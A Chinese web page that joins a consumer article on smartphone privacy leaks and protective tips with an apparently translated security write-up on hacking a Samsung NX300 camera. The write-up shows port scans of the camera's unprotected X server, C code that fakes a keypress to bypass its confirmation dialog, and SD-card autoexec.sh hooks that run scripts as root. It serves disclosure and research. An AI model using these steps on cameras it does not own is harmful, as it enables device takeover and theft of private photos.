手机加密了没！揭露智能手机泄密的真相
1论手机加密：案例！都是智能手机惹的祸　　随着智能手机的普及，智能手机的隐私保护问题日益被用户所重视，而最近的女星艳照门事件更是让用户对自己所用的智能手机的安全性提出了一个大大的问号，那么智能手机到底安全不，从一台智能手机中人们可以获取到哪些隐私资料？用户又该如何做才能更好的保护自己的隐私？一起来探讨一下吧。图1 智能手机可以呵护你的隐私？第一章：案例展现 都是智能手机惹的祸　　在开始之前，我们来看看几个比较经典的智能手机泄密的例子。　　例一：杀人藏尸 iPhone成破案关键　　2012年9月，20岁的佛罗里达大学的学生Pedro Bravo被指控谋杀自己的室友Christian Aguilar(18岁)。警方说，谋杀发生当天，Bravo询问苹果语音助手Siri如何藏尸，&我需要把室友(的尸体)藏起来&，而且当天夜里他还长时间使用了iPhone手机的手电筒。并且警方还在iPhone常去地点中找到了Pedro Bravo的藏尸之地。这事儿告诉人们别啥事都问搜索引擎。图2 你问了Siri啥事？　　例二：苹果艳照门 删除照片被恢复　　宁波某地，一名苹果产品专卖店的工作人员将一名女客户的iPhone进行维修后，女顾客原本已经删除的裸照居然也都被恢复出来。这名维修人员将这些裸照全部拷贝出来，放在了样板机的上面。而每个来此店光顾的人，都能一一欣赏。图3 手机里删除的照片也能找回　　相关阅读：　　例三：iCloud艳照门 当红女星惨兮兮　　据媒体报道有外国黑客疑利用苹果iCloud云端系统的漏洞，非法盗取了众多全球当红女星的裸照，继而在网络论坛发布。由于受影响的全是世界知名人士，包括奥斯卡影后詹妮弗-劳伦斯、Kate Upton，就连足球员Hope Amelia Solo都有份，加上詹妮弗和女星Mary Elizabeth Winstead亦承认了照片属实，，令这批为数约三百张的艳照快速流传，尽管相关社交网站已&用尽方法&封阻发布裸照的用户，但丝毫无法阻止艳照的流传速度，情况一发不可收拾。图4 你的iCloud密码简单么？　　例四：《性爱录像带》预告片 搞笑中隐射现实　　近日，喜剧《性爱录像带》发布了第一段预告片，预告片中将iPad、iCloud和性爱录像以非常夸张的方法融合在一起，探索了真实世界中极端的云服务问题。这部影片讲述了iCloud自动将夫妻之间的性爱录像自动上传至云端，并推送至所有绑定相同账户的iPad上的囧事，从预告片看挺搞笑的，但是却较为真实的反映了一些云安全问题。《性爱录像带》预告片　　根据《2014年上半年Android手机隐私安全报告》的数据显示，报告数据显示，92.8%用户习惯将隐私存储至智能手机中，74.1%存至台式机或笔记本，U盘、移动硬盘、平板电脑存储的隐私数据分别占到44.2%、30.7%、28.3%。由此可见智能手机已成为承载人们隐私最多载体。图5 调查数据2论手机加密：预防手机泄密的各种方法第二章：手机原来会说话 其实它可以告诉人们很多很多　　智能手机由于小巧玲珑而增加了丢失的风险，不小心遗失的、被盗的、拿去维修的智能手机不计其数，那么，如果有心之人拿到了你的智能手机，甚至无需接触你的手机，那么他可以从智能手机中获取到哪些关于你的资料呢？你可别以为你的智能手机不会说话，指望它能帮你保守秘密！软件名称：软件版本：2.5.2.28122软件大小：3.70MB软件授权：免费适用平台：Android下载地址：　　1、通讯录很受伤 常被用于诈骗　　首当其冲的当然是存储在手机里的通讯录、短信及通话记录了。通讯录对于骗子来说可是个好东西，现在不乏利用通讯录诈骗的案例。偷到手机，趁着失主还未挂失手机卡时，以失主名义群发通讯录来诈骗失主的亲朋好友，由于不少用户的手机通讯录中都会以称谓来录入通讯录，如&妈妈、老婆、叔叔&等，于是便在诈骗短信中加上称谓，使得诈骗短信更具迷惑性。图6 防不胜防的诈骗短信　　短信记录中则可以深入了解你与各个联系人的关系情况，银行通知短信则可以告诉别人你的工资收入有多少，你的银行卡里还有多少钱。　　当然附加的还有安装在智能手机里的各个即时通讯应用里的联系人及聊天记录，这些东西更是将你的社交网络一网打尽。　　最近的出现了不少利用即时通讯软件来假冒老板骗公司财务汇款的案件，就为用户敲响的警钟。所以为你手机上的即时通讯应用加上一个开启密码还是有必要的，虽然开启后会觉得很烦。图7 你帮你的即时通讯应用加上密码没？　　当然如果拿到你的手机卡，而你又未挂失的话，那么可能导致与之关联的支付宝等网上支付帐号的帐号密码被利用，他人可以利用密码找回功能以手机形式短信找回甚至重置你的密码，然后你的互联网金融帐户将被洗劫一空。&图8 支付宝已经加上了验证证件号码　　当然，以上情景非智能手机中也是可以实现的。安全支招：　　● 手机通讯录名称尽量写全名。　　● 收到的银行短信尽快删除。　　● 手机丢失后不仅要挂失手机卡、还要尽快修改即时通讯软件的密码。　　● 安装手机防盗工具，一旦发现手机丢失后，立即启动其远程删除手机所有数据功能销毁手机私密内容，以防止隐私泄露。　　● 手机卡开启PIN码与屏幕锁（手势密码）。　　2、不要艳照门 照片也危险　　接着就是照片，据说，许多人拿到别人的手机，第一时间查看的就是里边的照片。虽然这是非常不尊重别人隐私的举动，但是许多人却控制不了自己的好奇心。软件名称：软件版本：1.8.0.5软件大小：4.50MB软件授权：免费适用平台：Android下载地址：　　智能手机的照相功能日益强大，又基于它的随身携带特性，所以许多用户都习惯了拿起手机就拍照，什么东西都乱拍一通，又是为了避免忘记甚至把一些需保密信息拍了下来以前是烂笔头，现在是拍照取证。还有不少的情侣一时兴起，拍下来他们之间的私密照片，当然自拍的也不在少数，如此私密照片就这么留在了手机相册之中。　　【相关报道】图9 如此私密照片谁也不想泄漏吧　　在拍的时候确实很爽，却不知，别人拿到你的手机可以较为轻松愉快的导出你的照片慢慢欣赏更爽。甚至于有些已经被删除了的照片也能通过数据恢复类软件来进行恢复。　　再者目前许多智能手机的拍照功能都提供了记录GPS地理位置的功能，当你把照片上传到网络中时，人们便可以从照片信息中查看到该照片拍摄的GPS经纬度信息。你目前在哪有心之人就一清二楚。图10 查看照片属性就可以看到经纬度安全支招：　　● 尽量利用手机安全应用里的文件加密功能加密隐私文件。　　● 拍私密照片还是用没有联网功能的数码相机吧，当然了，最好就是不拍。　　● 删除私密照片请用专门的数据清除应用，特别是在卖旧手机时。　　● 关闭手机相机的保存地理位置功能。软件名称：软件版本：2.2.1617软件大小：2.15MB软件授权：免费适用平台：Android下载地址：&&图11 隐私空间+关闭手机相机的保存地理位置功能　　3、云同步是个双刃剑 好处与坏处并存　　说起照片，不得不说一下目前智能手机中的各种云同步功能，云同步确实是个不错的功能，利用它，用户可以将通讯录、通话记录、短信记录、照片、文件、系统配置等的信息同步存储在网络服务器中，以便在换新手机或者手机丢失时使用。俗话说手机有价，数据无价嘛，丢了手机数据还在就损失不大。软件名称：软件版本：7.0.1 官方版软件大小：9.74MB软件授权：免费适用平台：Android下载地址：图12 云同步（云存储）是个好东西　　iOS里的iCloud，还有安卓里的各个改造系统里内置的云同步功能，确实为用户提供了不少的方便，也为不少用户挽回了损失，但是却同时带来了不少的隐患。　　首先是用户云同步帐号的密码强度问题，部分报道指出黑客是利用暴力密码破解的手段最终破解明星iCloud账户的密码，进而导致好莱坞大量女星艳照门的。如果你密码易于被猜解，比如过于简单的123456，甚至是以你的个人资料作如姓名生日为密码的话，那么就实在太方便黑客们了。　　甚至于有些用户为了方便记忆，在互联网上用的是统一的帐号密码，比如在社交网站、电子邮箱、网络游戏、论坛等都是用统一的帐号与密码，那么黑客们只需要攻破了其中一个薄弱的环节，拿到你的帐号密码，就相当于拿到了万能钥匙，用它开启你的电子邮箱、云帐户轻松愉快。　　插播一条最新消息是：周二近493万的Gmail用户账号和密码被发布到了俄罗斯的比特币论坛上。发布这些账号密码的用户表示这其中约60％是有效的。　　猜解出你的云同步密码后，不仅可以查看上边同步的所有资料，还能定位你现在的位置，也就是时下流行的手机丢失定位功能，甚至可以操纵手机拍摄照片，还可以远程锁定你的手机用于敲诈。这个不是没有案例，之前就有报道：深圳唐先生因为邮箱被黑客攻破，致使苹果ID被盗、iPhone5s被锁。在尝试多种方法无果后，只能向黑客&屈服&，花钱解锁。软件名称：软件版本：5.2.5 正式版软件大小：18.97MB软件授权：免费适用平台：Android下载地址：图13 你的360手机卫士开启防盗功能没？图14 苹果ID被盗你的设备就危险了　　更有甚者，有些无良手机维修店会偷偷的帮不知情的用户开通云同步功能，进而用户手机里的隐私信息就被掌握。还有一个案例就是每家苹果店都会有一些临时ID，以帮助用户下载软件，由于一个ID可以在多台苹果设备上使用，多人使用一个ID和密码的情况理论上是存在的，一般店员都会提醒用户回家后自己要注册一个ID。可是许多用户根本就就不知道如何的去更改和注册新用户，于是乎，就这么用着公用账号了。　　笔者再大胆的猜想一下，对于外人来说，拿云数据库里的资料可能很困难，但对于内部的技术人员来说就如探囊取物，每一个云服务商中都难保不会出现一两个害群之马的维护技术人员，在好奇心和利益的驱使下，他们会怎么做呢？再来就是世界上的黑客技术帝可不少，更牢固的锁也有被攻破的一天。安全支招：　　● 立刻为你的云帐号更改一个强壮的密码，比如英文大写+英文小写+数字+超过8位的单独密码并定期更换。当然还要修改对应的邮箱帐号密码。　　● 关闭云同步功能，或者选择不要同步照片只同步通讯录等的资料。　　附：iOS关闭iCloud步骤　　设置&iCloud&储存与备份&关闭iCloud云备份。也可以在这里选择需要备份的内容。　　4、手机应用要求真多 乱给权限　　即使你有了防范意识，也难免在往智能手机中安装应用时会遇到遇到恶意应用，这些应用也能将你的照片偷偷上传。软件名称：软件版本：2.9.52 官方版软件大小：7.69MB软件授权：免费适用平台：Android下载地址：　　说起应用，不得不说安卓应用里的权限要求泛滥之势。有多少用户会留意在安装应用时那一大串的权限请求列表呢，而且即使看了，你不爽，但是如果你需要用到它，还不是得安装它。图15 你有留意过应用权限请求么？　　获取通讯录那是许多应用默认要求的基本权限；一个手电筒应用要获取你的地理位置、通讯录等的隐私信息；一个游戏需要你的手机给它拍照和录音的权限；一个常用应用正在收集你的个人爱好信息。　　至于获取用户地理位置也是许多应用喜欢做的事儿，大多数收集都是基于手机基站位置的，但是部分应用还收集基于GPS用户精确位置的信息。其中最讨厌的就是发短信权限，恶意应用在后台偷偷发短信，游戏应用在前台诱惑你购买游戏道具，结果就是话费余额一下子就木有了。　　恶意应用获取到了这些权限，就可以为所欲为了，窃听、照片、偷资料等等什么的就跟玩似的。图16 小孩子轻松一点确认 你的话费就灰飞烟灭图17 安装一个安全软件限制一下应用的权限吧　　在智能手机里的操作或数据都会转化成二进制，保存在内置存储器或者闪存里。你用了哪些应用、用了多长时间，用了多少次，如此这些信息都会被系统保留下来。理论上来说，一切硬件上存储的信息都可以被收集。（此段引用自百度）图18 应用使用信息　　部分由应用收集的信息被用于优化应用的层面上，为开发者提供修改应用所需要的数据。还有部分则被用于了广告项目，大部分的免费应用都靠广告来获得收益。甚至还被政府部门所利用。据科技博客网站Gizmodo报道,最近发表的美国国家安全局和英国政府通讯总部内部幻灯片内容表明,间谍机构经常利用一些智能手机的应用比如热门游戏来挖掘个人信息。　　更别提目前许多国产手机应用将以前在PC软件中的流氓手段搬到了手机上，弹广告、捆绑其它应用、收集用户隐私信息，甚至于诈骗用户说必须安装某某应用后才能正常使用，结果用户安装后还是继续那个提示，要不就是永远的载入中。而且目前大多数国产应用都想方设法的想要驻留内存，手动关闭后，一个开启网络、开启屏幕等操作又能将它唤醒。驻留内存干嘛？收集信息，弹广告呗。软件名称：软件版本：1.6.1软件大小：92.16KB软件授权：免费适用平台：Android下载地址：图19 这么多可以让应用自行启动的项目图20 笔者在某知名应用市场下载到的诱导安装软件　　对比以上情况，较为封闭的iOS系统就好了许多，至少在未越狱的设备中安装的许多应用的权限都是被限制的。但是用户的越狱操作却让iOS的防线漏洞百出。安全支招：　　● 安装一款带权限管理的安全软件。　　● 致电运营商客服关闭移动付费功。　　● 苹果尽量别越狱、安卓尽量不要root，其实这个是矛盾的问题，许多安全软件都需要root权限才能使用全部功能。　　● 不要随意下载不明App手机应用，尽量去正版市场安装应用，iOS是App Store，安卓的则是 Google Play。这两个正规市场里的应用都经过官方检测，安全性较有保障。可是目前国内手机不是打开Google Play缓慢就是无法运行Google Play。　　● 收到带链接的短信要慎重，无论是否是你的联系人所发都不要轻易打开信息中的链接，通过短信传播是今年以来手机木马的重要传播方式。　　● 你的手机购物软件加上开启密码没？图21 你的安卓手机里有Google Play么？3论手机加密：听笔者谈谈手机的自我保护第三章：谈谈手机的自我保护　　智能手机都有屏幕锁功能（手势密码或数字密码），但是据笔者所知，鲜有老年人会使用该功能，而中年使用人群中也有很大一部分没有为自己的手机加上屏幕密码锁，反而青年用户更注重一些，但是也有相当一部分没有加上。软件名称：软件版本：3.10官方版软件大小：4.90MB软件授权：免费适用平台：Android下载地址：图22 你的手机开启屏幕锁没？　　没有屏幕锁的手机，别人一拿到手就可以轻松愉快的获取到你的信息，而部分加了屏幕锁的智能手机中，却忘了一个非常简单的破解方式，屏幕中的手指划痕，不信？你先用手势密码解锁手机，然后关闭屏幕，在斜着观看手机屏幕，看到了什么？　　还有就是安卓系统的USB调试功能，开启了它，就相当于将系统的管理权限开放了一半，将手机以USB形式连接到电脑，就可以用各种手段来破解屏幕密码，甚至绕过屏幕密码，直接获取你手机里的隐私资料。再加上root权限，你的手机屏幕锁防线是相当的脆弱。　　简单的来说：比如时下许多手机默认的安装了各种的手机助手类软件，这个时候，只需要使用该应用的PC客户端软件来连接手机，根本就无需解锁屏幕，直接就可获取到你的所有资料信息。新安卓系统有了新电脑接入时提示功能，填补了这个漏洞，但对于信任计算机来说还是不设防的。图23 轻松接入锁屏手机图24 是否允许USB调试安全支招：　　● 关闭USB调试功能。　　● 设置屏幕锁。　　● 不要连入安全性未知或陌生的wifi网络，或者在陌生WIFI网络中不要进行网络购物及进行登陆操作，以免帐号密码被盗。　　附：安卓系统关闭usb调试功能步骤如下　　设置&开发者选项&关闭USB调试。新安卓系统（貌似4.2以上）默认不显示开发者选项，需要在设置&关于手机&连续点击七次版本号。总结　　谁也不愿自己的手机像《窃听风云3》中的手机那样成为移动监视器，谁也不愿自己存储在手机里的私密文件被泄漏，养成良好的手机使用习惯，不要安装乱七八糟的手机应用，再请个靠谱的手机安全软件来帮忙照看一下，智能手机咱还是可以用的很爽的，况且许多用户已经离不开它。　　再总结一下，智能手机可以告诉别人它的主人是谁，干什么的，有哪些兴趣爱好、家在哪、公司在哪、常去地方、现在在哪，财产情况，社交状况，还有能展现你的私密照片，等等等等。
软件论坛帖子排行
最新资讯离线随时看
聊天吐槽赢奖品
相关软件：
大小：1.93 MB
授权：免费
大小：19.48 MB
授权：免费揭秘黑客黑掉三星NX300智能相机的技术分析
三星NX300是一款无反光相机且内置NFC功能并可以连接WiFi。你可以通过连接本地WiFi将需要上传的内容传至云服务器，通过DLNA电视或智能手机来分享图片，对于后者提供了远程远程取景器以及MobileLink 功能，通过没有加密的无线接入点可以访问X server以及任何数据。
下文将会展示过程，当然你也可以随时关注这个项目。
Ntag203是指NFC里面的芯片的一种，同时也是是NXP推出的第一款针对NFC的芯片。利用预编程在用户存储器缓冲区里面的SRAM映射允许NDEF消息内容的动态更新，通过谷歌商店下载并安装三星智能相机APP，然后向应用程序提供无线接入点名称。
Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX
Type: EXTERNAL: urn:nfc::pkg
Payload: com.samsungimaging.connectionmanager
标签是可以擦写的，所以一些恶意攻击者可以修改标签来下载恶意程序，然后再打开网页发现访问的是非法网站，通过具有NFC功能的智能手机就可以看到，这可以证明修改
标签可以自定义一个网站链接，deployed标签是支持长久写入锁定的，如果你遇到一个爱开玩笑的恶意攻击者，会把你的设备定向到一个色情网站。
WiFi无线网络
你可以配置NX300来连接无线网络，它会开放一些功能，例如DLNA功能，来运行一下端口扫描来看看都有什么服务
megavolt:~# nmap -sS -O nx300
Starting Nmap 6.25 ( http://nmap.org ) at
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT & & STATE SERVICE
6000/tcp open &X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see here&).
当&E-Mail&应用程序打开之后，开始扫描，当MobileLink、7676/tcp以及AllShare Play开启。此外，远程取景器模式开启，也需要打开7679/tcp。
X Server是开放的吗？
georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed&0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed&13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed&13-120-75-75-c-60-iso8859-1
georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480&800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
& &480&800 & & & &60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)
georg@megavolt:~$ for i in $(xdotool search &.&) ; do xdotool getwindowname $ done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)
Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300
不！这个X server并没有受到保护，这里出现了运行程序提示，我们甚至可以在里面运行应用程序，但显示内容有限
利用相机上键子与X11系统功能进行绑定，如下
无线网客户端：固件更新检测
当相机开启时候，会进行检索，向发出一个请求
GET / HTTP/1.1
Content-Type: text/charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov :48 GMT
Last-Modified: Mon, 31 Dec :18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive
这看起来像是空操作指令，但也许这是一个后门，允许远程执行代码？谁知道？然后向http://ipv4.connman.net/online/status.html发出请求，返回一个空文件。里面的文件头含有你的位置信息（显然是从IP地址获取的）
X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin
好吧他们知道我的IP，至少没有查询任何特定的标识符然后发送，最后一步，相机固件版本更新以及根据日志重新定向到一个XML文档。到目前为止已知的版本：
1.40 XML (ZIP, 241MB)
1.32 XML (ZIP, 241MB)
WiFi接入点：UPnP/DLNA
两个应用程序（MobileLink, Remote Viewfinder）连接未加密无线接入点 AP_SSC_NX300_0-XX:XX:XX （XX:XX:XX是Mac地址一部分），值得注意的是，这里有一个认证的对话框，防止远程控制。
不幸的是这个对话框出现在开放的X server上面，所以我们需要伪造一个KP_Return事件（基于bharathisubramanian实例），根据启用的不同模式，我们可以连接任意的客户端，然后利用sd卡下载图片资料。
/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
&KeyCode keycode = 0, modcode = 0;
&keycode = XKeysymToKeycode (disp, keysym);
&if (keycode == 0)
&XTestGrabControl (disp, True);
&/* Generate modkey press */
&if (modsym != 0) {
& modcode = XKeysymToKeycode(disp, modsym);
& XTestFakeKeyEvent (disp, modcode, True, 0);
&/* Generate regular key press and release */
&XTestFakeKeyEvent (disp, keycode, True, 0);
&XTestFakeKeyEvent (disp, keycode, False, 0);&
&/* Generate modkey release */
&if (modsym != 0)
& XTestFakeKeyEvent (disp, modcode, False, 0);
&XSync (disp, False);
&XTestGrabControl (disp, False);
/* Main Function */
int main (){
&Display *disp = XOpenDisplay (NULL);
&sleep (1);
&/* Send Return */
&SendKey (disp, XK_Return, 0);
DLNA服务：远程取景器
当使用安卓系统应用程序里面查询功能DLNA 服务会暴漏出相机的一些问题，设备名称[Camera]NX300，可以通过HTTP 请求发送http://nx300:7676/smp_2_
& urn:schemas-upnp-org:device:MediaServer:1
& [Camera]NX300
& Samsung Electronics
& Samsung Camera DMS
Folderview
& smi,getMediaInfo.sec,getCaptionInfo.sec
& uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
& & & urn:schemas-upnp-org:service:ContentDirectory:1
& & & urn:upnp-org:serviceId:ContentDirectory
& & & /smp_4_
& & & /smp_5_
& & & /smp_3_
& & & urn:schemas-upnp-org:service:ConnectionManager:1
& & & urn:upnp-org:serviceId:ConnectionManager
& & & /smp_7_
& & & /smp_8_
& & & /smp_6_
附加SOAP服务来改变对焦和闪光灯设置 (/smp_3_)
另外一种服务图像/视频 (/smp_4_)
& & & & 54723648
& & & & 19201080
& & & & offauto
& & & & auto
& & & & offauto
& & & & off
& & & & highlow
& & & & high
& & & http://192.168.102.1:7679/livestream.avi
& & & http://192.168.102.1:7679/qvga_livestream.avi
再触发正确的指令后，一个在线的视频出现在http://nx300:7679/livestream.avi，如果尝试利用 wget或mplayer获取一些视频会失败。&源代码&在三星的开源软件发布平台，压缩包大小约834MB，主要包括三份 rootfs image（每份400-500MB），还有一些脚本程序。当然在TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO下面会有一些Obamapics。该项目建立在旧版本的Tizen系统上，我在这方面不是高手，有些人会将这些分开，生成一个正确的运行环境或利用OpenWRT端口。
上面已经对NFC以及WiFi功能做了介绍，下面将会更深入的介绍，在相机上获取root权限并远程执行shell脚本程序，这个过程比较实用可以借鉴到不同的电子产品，例如家用路由器、智能电视机等。
固件：寻找
大多数的固件都在运行时会给用户提供一个shell脚本，这个功能通常是在&software engineers&添加的，从另一方面来看，这也是一个本地权限&后门&，对于相机，sd卡是一个存储与搜索文件的好地方。其它的一些设备可能从U盘或内置硬盘来运行程序。
通常情况下我们升级固件文件（nx300.bin压缩包大小241MB），通过 binwalk（固件分析软件）分析，设置并挂载根文件系统，然而在这种情况下，三星开源软件发布平台曾发布一个根系统文件树TIZEN/project/NX300/image/rootfs
georg@megavolt:TIZEN/project/NX300/image/rootfs$ ls -l
drwxr-xr-x &4 4096 Oct 16 &2013 bin/
drwxr-xr-x &3 4096 Oct 16 &2013 data/
drwxr-xr-x &3 4096 Oct 16 &2013 dev/
drwxr-xr-x 38 4096 Oct 16 &2013 etc/
drwxr-xr-x &9 4096 Oct 16 &2013 lib/
-rw-r&r& &1 &203 Oct 16 &2013 make_image.log
drwxr-xr-x &8 4096 Oct 16 &2013 mnt/
drwxr-xr-x &3 4096 Oct 16 &2013 network/
drwxr-xr-x 16 4096 Oct 16 &2013 opt/
drwxr-xr-x &2 4096 Oct 16 &2013 proc/
lrwxrwxrwx &1 & 13 Oct 16 &2013 root -& opt/home/root/
drwxr-xr-x &2 4096 Oct 16 &2013 sbin/
lrwxrwxrwx &1 & &8 Oct 16 &2013 sdcard -& /mnt/mmc
drwxr-xr-x &2 4096 Oct 16 &2013 srv/
drwxr-xr-x &2 4096 Oct 16 &2013 sys/
drwxr-xr-x &2 4096 Oct 16 &2013 tmp/
drwxr-xr-x 16 4096 Oct 16 &2013 usr/
drwxr-xr-x 13 4096 Oct 16 &2013 var/
我们找到对应位置来看看貌似这个文件make_image.log在相机组装之前，有人忘记清理了（这个文件实际上就存在相机中)
SBS logging begin
Wed Oct 16 14:27:21 KST 2013
WARNING: setting root UBIFS inode UID=GID=0 (root) and permissions to u+rwx,go+ use &squash-rino-perm or &nosquash-rino-perm to suppress this warning
如果我们可以认为/sdcard下有symlin，sd卡被挂载在/mnt/mmc目录下，实际上该目录下会有许多之前的脚本或者工具，我们开始运行它们
georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep /mnt/mmc -r .
./etc/fstab:/dev/mmcblk0 & &/mnt/mmc & & & &exfat & noauto,user,umask=
./etc/fstab:/dev/mmcblk0p1 &/mnt/mmc & & & &exfat & noauto,user,umask=
./usr/sbin/pivot_rootfs_ubi.sh:umount /oldroot/mnt/mmc
./usr/sbin/rcS.pivot: & mkdir -p /mnt/mmc
./usr/sbin/rcS.pivot: & & & mount -t vfat -o noatime,nodiratime $card_path /mnt/mmc
./usr/bin/inspkg.sh: & &mount -t vfat /dev/mmcblk0 /mnt/mmc
./usr/bin/inspkg.sh: & &mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/inspkg.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc &&
./usr/bin/inspkg.sh:find /mnt/mmc -name &*$1*.deb& -exec dpkg -i {} \; 2& /dev/null
./usr/bin/ubi_initial.sh:mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/ubi_initial.sh:cd /mnt/mmc
./usr/bin/remount_mmc.sh: & nr_mnt_dev=`/usr/bin/stat -c %d /mnt/mmc` #/opt/storage
./usr/bin/remount_mmc.sh: & & & umount /mnt/mmc 2& /dev/null
./usr/bin/remount_mmc.sh: & & & & & /bin/mount -t vfat /dev/mmcblk${i}p1 /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
./usr/bin/remount_mmc.sh: & & & & & & & /bin/mount -t vfat /dev/mmcblk${i} /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
[ stripped a bunch of binary matches in /usr/bin and /usr/lib ]
在这里我们可以看到Linux启动配置文件(fstab, rcS.pivot, ubi_initial.sh)，这有一个非常有趣的脚本可以让sd卡 (inspkg.sh)安装Debian 软件包，以及50个共享对象，同时在 /mnt/mmc
下存在可执行二进制文件。
首先我们来看看inspkg.sh
#! /bin/sh
if [ &$#& = &2& ]
& & if [ &$2& = &0& ]
& & echo -e &mount mmcblk0..&
& & mount -t vfat /dev/mmcblk0 /mnt/mmc
& & echo -e &mount mmcblk0p1&&
& & mount -t vfat /dev/mmcblk0p1 /mnt/mmc
echo -e &mount mmcblk0p1&&
mount -t vfat /dev/mmcblk0p1 /mnt/mmc &&
find /mnt/mmc -name &*$1*.deb& -exec dpkg -i {} \; 2& /dev/null
echo -e &sync&.&
这是一个 shell 脚本，同时需要1-2个参数。第一个是为了寻找安装包的名称（利用find命令来查找目标名称），第二个命令被用来正确挂载sd卡分区，当然我们也可以用这个命令安装&dropbear、gcc、moon-buggy。现在我们就需要弄清楚这些脚本是如何运行的
georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep -r inspkg.sh .
georg@megavolt:TIZEN/project/NX300/image/rootfs$&
然而固件文件中并没有它，我们需要走另外一条路。
Binary Blob
在 /usr/bin目录下，里面最有意思的文件是 di-camera-app-nx300，可以参考/mnt/mmc/Demo/NX300_Demo.mp4，/mnt/mmc/SYSTEM/Device.xml以及/mnt/mmc/sounds/ 目录下的一些WAV文件，这些看起来和用户操作界面操作有关系（删除文件操作等）。这显然是 binary blob可以控制有趣的事情（如用户界面，快门，和图像处理器），目前有不少的电子消费产品已经开源了，并包含一个可执行程序运行库。正如预期的那样，这个程序不知道从哪里冒出来的，但有出现安装过安装包（di-camera-app-nx300 Debian (安装包version 0.2.387)）的痕迹。
Package: di-camera-app-nx300
Status: install ok installed
Priority: extra
Section: misc
Installed-Size: 87188
Maintainer: Sookyoung Maeng &[snip]@&, Jeounggon Yoo &[snip]@&
Architecture: armel
Source: di-camera-app
Version: 0.2.387
Depends: libappcore-common-0, libappcore-efl-0, libaul-1, libbundle-0, libc6 (&= 2.4),
& & libdevman-0, libdlog-0, libecore, libecore-evas, libecore-file, libecore-input,
& & libecore-x, libedje (&= 0.9.9.060+svn), libeina (&= 1.0.0.001+svn),
& & libelm, libevas (&= 0.9.9.060+svn), libgcc1 (&= 1:4.4.0),
& & libglib2.0-0 (&= 2.12.0), libmm-camcorder, libmm-player, libmm-sound-0,
& & libmm-utility, libnetwork-0, libnl2 (&= 2.0), libslp-pm-0, libslp-utilx-0,
& & libstdc++6 (&= 4.5), libvconf-0, libwifi-wolf-client, libx11-6,
& & libxrandr2 (&= 2:1.2.0), libxtst6, prefman, libproduction-mode,
& & libfilelistmanagement, libmm-common, libmm-photo, libasl, libdcm,
& & libcapture-fw-slpcam-nx300, libvideo-player-ext-engine, libhibernation-slpcam-0,
& & sys-mmap-manager, libstorage-manager, libstrobe, libdustreduction, libmm-slideshow,
& & di-sensor, libdi-network-dlna-api, libproduction-commands, d4library,
& & diosal
Description: Digital Imaging inhouse application for nx300
所以这个安装包通过即& di-camera-app&创建的，除了&内部&，其它地方是不存在的。除了一些启动/停止程序脚本，在 TIZEN/build/exec.sh目录下还有一些有趣的脚本，看起来像是启动和安装混合在一起的脚本程序
cp -f *.so /usr/lib
cp -f di-camera-app-nx300 /usr/bin
di-camera-app &
（因为只有一个是同步的，你可能一直不清楚这一点，如果你保证你的300%数据都已经写入进去可能两个程序都已经在运行状态下了）
当相机应用程序连接WiFi时，你会注意到另外一个&magic binary blob&， smart-wifi-app-nx300（三星创建的名称），然而没有一个程序做出有关代码执行的提示，我们需要更深入的挖掘。
搜索共享库
/usr/lib目录下情况有所不同，从文件中读取字符串到 string对象，一定要注意sd卡挂载点。（限制输出相关线程）
georg@megavolt:TIZEN/project/NX300/image/rootfs$ for f in `grep -l /mnt/mmc *.so` ; do \
& & & & & & & & echo && $f& ; strings $f | grep /mnt/ done
& libmisc.so
/mnt/mmc/autoexec.sh
& libnetwork.so
/mnt/mmc/iperf.txt
& libstorage.so
/usr/bin/iozone -A -s 40m -U /mnt/mmc -f /mnt/mmc/test -e & /tmp/card_result.txt
cp /tmp/card_result.txt /mnt/mmc
/mnt/mmc/auto_run.sh
/mnt/mmc/autoexec.sh以及/mnt/mmc/auto_run.sh这两个文件目录一直都是我们想要找到的。我们尝试修改其中一个看看会发生什么。
autoexec.sh
为了看见测试结果，我们需要通过USB安装相机驱动，在其文件夹根目录下创建autoexec.sh 文件（Windows用户注意，此处需要UNIX换行符！）
LOG=/mnt/mmc/autoexec.log
date && $LOG
id && $LOG
echo &$PATH& && $LOG
ps axfu && $LOG
mount && $LOG
